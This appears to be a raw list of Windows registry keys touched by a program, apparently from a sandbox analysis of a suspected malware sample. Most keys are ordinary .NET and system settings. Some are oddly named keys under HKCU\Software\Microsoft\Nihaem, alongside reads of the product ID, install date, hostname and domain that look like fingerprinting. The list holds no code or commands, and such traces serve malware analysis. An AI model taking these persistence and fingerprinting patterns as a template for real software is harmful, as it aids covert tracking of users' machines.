HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\InstallDate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DigitalProductId
HKEY_CURRENT_USER\Software\Microsoft\Nihaem\Woqiakr
HKEY_CURRENT_USER\Software\Microsoft\Nihaem\Gyawvy
HKEY_CURRENT_USER\Software\Microsoft\Nihaem\Zugoosy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_CURRENT_USER\AppEvents\Schemes\(Default)
HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\Open\.Current\(Default)
HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\Open\.Current\Default Flags
HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\Close\.Current\(Default)
HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\Close\.Current\Default Flags
HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemExclamation\.Current\(Default)
HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemExclamation\.Current\Default Flags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi9
HKEY_CURRENT_USER\System\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm\wheel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wdmaud.drv
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0},2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\Properties\{026e516e-b814-414b-83cd-856d6fef4822},2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc},2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc},6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc},1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\Properties\{1da5d803-d492-4edd-8c23-e0c0ffee7f0e},0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{f0a94b61-1058-4fc2-a399-e1993f00d33a}\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0},2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{f0a94b61-1058-4fc2-a399-e1993f00d33a}\Properties\{026e516e-b814-414b-83cd-856d6fef4822},2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{f0a94b61-1058-4fc2-a399-e1993f00d33a}\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc},2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{f0a94b61-1058-4fc2-a399-e1993f00d33a}\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc},6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{f0a94b61-1058-4fc2-a399-e1993f00d33a}\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc},1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{f0a94b61-1058-4fc2-a399-e1993f00d33a}\Properties\{1da5d803-d492-4edd-8c23-e0c0ffee7f0e},0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Capture\{8ffeba2b-46f7-4109-9e36-e28c93d90faa}\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0},2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Capture\{8ffeba2b-46f7-4109-9e36-e28c93d90faa}\Properties\{026e516e-b814-414b-83cd-856d6fef4822},2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Capture\{8ffeba2b-46f7-4109-9e36-e28c93d90faa}\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc},2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Capture\{8ffeba2b-46f7-4109-9e36-e28c93d90faa}\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc},6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Capture\{8ffeba2b-46f7-4109-9e36-e28c93d90faa}\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc},1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Capture\{8ffeba2b-46f7-4109-9e36-e28c93d90faa}\Properties\{1da5d803-d492-4edd-8c23-e0c0ffee7f0e},0
HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemHand\.Current\(Default)
HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemHand\.Current\Default Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.106\CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.101\CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.103\CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.100\CheckSetting
